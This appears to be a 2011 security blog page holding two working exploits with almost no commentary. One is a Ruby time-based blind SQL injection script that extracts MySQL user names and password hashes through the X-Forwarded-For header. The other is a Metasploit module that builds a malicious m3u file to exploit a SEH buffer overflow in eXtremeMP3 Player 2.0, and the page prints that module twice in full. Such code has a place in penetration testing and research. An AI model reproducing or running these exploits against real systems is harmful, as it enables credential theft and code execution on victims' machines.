simple script i wrote during a pentest for a customer, nothing fancy just practical :D
#!/usr/bin/env ruby
# network penetration test (10/2011)
# http header blind sql injection
require "net/http"
require "uri"
STDOUT.sync = true
@url = URI.parse("http://xxx.xxxx.xxx")
def fuxx(data)
req = Net::HTTP::Get.new(@url.path)
req.add_field("X-Forwarded-For", "#{data}")
t_start = Time.now.to_i
res = Net::HTTP.new(@url.host, @url.port).start do |http|
http.request(req)
end
t_stop = Time.now.to_i
timer = t_stop - t_start
return timer
end
(1..58).each { |i|
(32..126).each { |ch|
data = "1' AND (SELECT IF(ASCII(SUBSTRING((SELECT CONCAT(user,0x3a,password) FROM mysql.user LIMIT 2,1),#{i},1))>#{ch},NULL,BENCHMARK(1500000,MD5(CHAR(118)))))>'0"
if (fuxx(data) > 4)
print ch.chr
break
end
}
}
Friday, October 28, 2011
Monday, January 17, 2011
eXtremeMP3 Player 2.0 buffer overflow (SEH - Egghunter)
##
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# Security Team: Intranium Sdn Bhd, Malaysia
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'eXtremeMP3 Player 2.0 (m3u file) buffer overflow (SEH)',
'Description' => %q{
This module exploits a seh-based buffer overflow in eXtremeMP3 Player 2.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'C4SS!0 G0M3S', # original exploit
'Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com', # metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/15994/' ],
],
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x30",
'StackAdjustment'=> -1500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 & SP2 (EN)', { 'Ret' => 0x00401A2D } ], # POP ECX/POP EAX/RET [xtremeplaylist.exe]
# Tested on Win XP SP3 Version 5.1.2600 [OK]
# Tested on WIn XP SP2 [OK]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 15 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'crash.m3u']),
], self.class)
end
def exploit
badchars = ''
eggoptions = { :startreg => 'eax', :checksum => true, :eggtag => 'w00t' }
hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)
fsploit = ''
fsploit << make_nops(1024)
fsploit << egg
fsploit << rand_text_alpha_upper(3244 - fsploit.length) # PADDING
fsploit << [0x76B2D577].pack('V') # JMP ESP [atl.dll]
fsploit << hunter
fsploit << rand_text_alpha_upper(4112 - fsploit.length) # PADDING
fsploit << [0xc3616161].pack('V') # POPAD/POPAD/POPAD/RET
fsploit << [target.ret].pack('V') # POP ECX/POP EAX/RET [xtremeplaylist.exe]
fsploit << rand_text_alpha_upper(8)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(fsploit)
end
end
# $Id: $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# Security Team: Intranium Sdn Bhd, Malaysia
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'eXtremeMP3 Player 2.0 (m3u file) buffer overflow (SEH)',
'Description' => %q{
This module exploits a seh-based buffer overflow in eXtremeMP3 Player 2.0.
},
'License' => MSF_LICENSE,
'Author' =>
[
'C4SS!0 G0M3S', # original exploit
'Muhamad Fadzil Ramli - mind1355[at]gmail[dot]com', # metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/15994/' ],
],
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x0a\x0d\x30",
'StackAdjustment'=> -1500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 & SP2 (EN)', { 'Ret' => 0x00401A2D } ], # POP ECX/POP EAX/RET [xtremeplaylist.exe]
# Tested on Win XP SP3 Version 5.1.2600 [OK]
# Tested on WIn XP SP2 [OK]
],
'Privileged' => false,
'DisclosureDate' => 'Jan 15 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'crash.m3u']),
], self.class)
end
def exploit
badchars = ''
eggoptions = { :startreg => 'eax', :checksum => true, :eggtag => 'w00t' }
hunter, egg = generate_egghunter(payload.encoded, badchars, eggoptions)
fsploit = ''
fsploit << make_nops(1024)
fsploit << egg
fsploit << rand_text_alpha_upper(3244 - fsploit.length) # PADDING
fsploit << [0x76B2D577].pack('V') # JMP ESP [atl.dll]
fsploit << hunter
fsploit << rand_text_alpha_upper(4112 - fsploit.length) # PADDING
fsploit << [0xc3616161].pack('V') # POPAD/POPAD/POPAD/RET
fsploit << [target.ret].pack('V') # POP ECX/POP EAX/RET [xtremeplaylist.exe]
fsploit << rand_text_alpha_upper(8)
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(fsploit)
end
end
Subscribe to:
Posts (Atom)